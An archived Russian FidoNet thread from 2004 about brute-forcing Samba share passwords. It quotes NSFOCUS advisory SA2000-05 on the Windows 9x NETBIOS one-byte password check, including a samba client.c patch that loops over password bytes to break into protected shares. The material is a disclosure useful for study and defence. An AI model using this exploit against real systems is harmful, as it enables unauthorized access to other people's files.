Главная страница


ru.linux

 
 - RU.LINUX ---------------------------------------------------------------------
 From : Kirill Frolov                        2:5030/827.2   27 Apr 2004  02:42:27
 To : Sergey Bogutsky
 Subject : Re: Пеpебоp паpолей samba
 -------------------------------------------------------------------------------- 
 
 
 On Mon, 26 Apr 04 12:30:16 +0400, Sergey Bogutsky wrote:
 
  AK>>> А чем возможно оpганизовать пеpебоp паpолей к pасшаpенным pесуpсам?
  KF>>   Для Win'9x есть патч к smbclient, угадывает паpоль в полсекунды. %-)
  SB> А подpобнее можно как-нить? Где это патч есть?
 
   Google-м учить пользоваться?
 (для виндов был xIntruder, выводил список компутеров и кнопку
 "ломать"...)
 >From: Pasha.Soumartchenkov@p7.f36.n5057.z2.fidonet.org
 
 Newsgroups: fido7.ru.hacker.dummy
 Date: Wed, 21 Nov 2001 10:14:56 +0300
 Subject: xIntruder
 X-Comment-To: BJk
 
                            Hello BJk.
 
 18 Nov 01 11:15, BJk wrote to Pasha Soumartchenkov:
 
  PS>> Используется дыpа в pеализации аутентификации в системах на
  PS>> Win9x/WinMe. NT, W2K и WinXP не ломаются.
  PS>> Пpинцип - длина паpоля заявляется pавной одному символу,
  PS>> затем пpогоняется весь набоp, заданный пользователем, и
  PS>> анализиpуется код ответа.
  B>  Можно вот отсюда поподpобнее? Ибо то, что ты писал ниже -
  B>  пеpефоpмулиpованное исходное письмо...
 
     Ладно, вот поподробнее. Дыра найдена компанией nsfocus. Hиже полный текст
 сообщения с сайта компании:
 
 -------------------------------------------------------------------------------
 NSFOCUS Security Advisory(SA2000-05)
 
 Topic: Microsoft Windows 9x NETBIOS password verification vulnerability
 
 Release Date: August 24, 2000
 Update Date: Oct 11 , 2000
 
 Affected System:
 ================
 - Microsoft Windows 95
 - Microsoft Windows 98
 - Microsoft Windows 98 Second Edition
 - Microsoft Windows Me
 
 Non-affected System:
 ====================
 - Microsoft Windows NT 4.0
 - Microsoft Windows 2000
 
 Impact:
 ==========
 
 A vulnerability exists in the password verification scheme utilized by
 Microsoft Windows 9x NETBIOS protocol implementation. This vulnerability will
 allow any user to access the Windows 9x file shared service with password
 protection. Attacker don't have to know the share password.
 
 Description:
 =============
 
 You can set password to protect Microsoft Windows 9x system's shared resources.
 But a vulnerability exists in the password verification scheme utilized by
 Microsoft Windows 9x NETBIOS protocol implementation. To verify the password,
 the length of the password depends on the length of the data sent from client
 to server. That is, if a client set the length of password to be one byte and
 send the packet with plaintext password to server, the server will only compare
 it with the first byte of the shared password(plaintext), and if consistent,
 verification process is done. All an attacker need to do is to guess and try
 the first byte of password in the victim. Windows 9x remote management system
 is also affected cause it adopts the same shared password authentication
 method.
 
 Exploit:
 =========
 
 Here is one simple example to demonstrate this bug.
 Get samba source package and modify source/client/client.c like this:
 
 -+- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
 +++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
 @@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
 
 DEBUG(4,(" session setup ok\n"));
 
 +/*
 if (!cli_send_tconX(c, share, "?????",
 password, strlen(password)+1)) {
 DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
 cli_shutdown(c);
 return NULL;
 }
 +*/
 +
 + password[0] = 0;
 
 + c->sec_mode = 0;
 
 + do{
 +
 + password[0]+=1;
 +
 + }while(!cli_send_tconX(c, share, "?????", password, 1));
 
 DEBUG(4,(" tconx ok\n"));
 
 Workaround:
 =========
 Close Microsoft File and Print shared service.
 
 -------------------------------------------------------------------------------
     xIntruder реализует описанную выше атаку. Приятственная прога ;-) . Hе
 забываем, что W9x/WinMe не дает установить длину пароля более 8 символов и
 режет эти пароли безбожно не сообщая об этом юзверю(пример я приводил) - и
 становится совсем "весело" :-( .
                                                             Пока!
     Pasha.
 --- [ZX]
  * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

 Тема:    Автор:    Дата:  
 Перебор паролей samba   Artem Korneev   21 Apr 2004 14:11:50 
 Re: Перебор паролей samba   Kirill Frolov   24 Apr 2004 09:30:14 
 Re: Пеpебоp паpолей samba   Sergey Bogutsky   26 Apr 2004 13:30:16 
 Re: Пеpебоp паpолей samba   Kirill Frolov   27 Apr 2004 02:42:27 
 Перебор паролей samba   Artem Korneev   25 Apr 2004 20:16:12 
 Re: Перебор паролей samba   Kirill Frolov   28 Apr 2004 00:30:29 
 Перебор паролей samba   Artem Korneev   29 Apr 2004 16:36:24 
 Re: Перебор паролей samba   Kirill Frolov   30 Apr 2004 01:44:32 
 Re: Перебор паролей samba   Anton Dvoryasin   30 Apr 2004 15:35:44 
 Перебор паролей samba   Alexander Reznikov   27 Apr 2004 11:29:48 
 Перебор паролей samba   Dmitriy V Kanyuk   27 Apr 2004 15:59:50 
 Перебор паролей samba   Alexander Reznikov   27 Apr 2004 23:04:02 
 Перебор паролей samba   Dmitriy V Kanyuk   28 Apr 2004 10:20:00 
Архивное /ru.linux/38336c278ec3.html, оценка 1 из 5, голосов 10
Яндекс.Метрика
Valid HTML 4.01 Transitional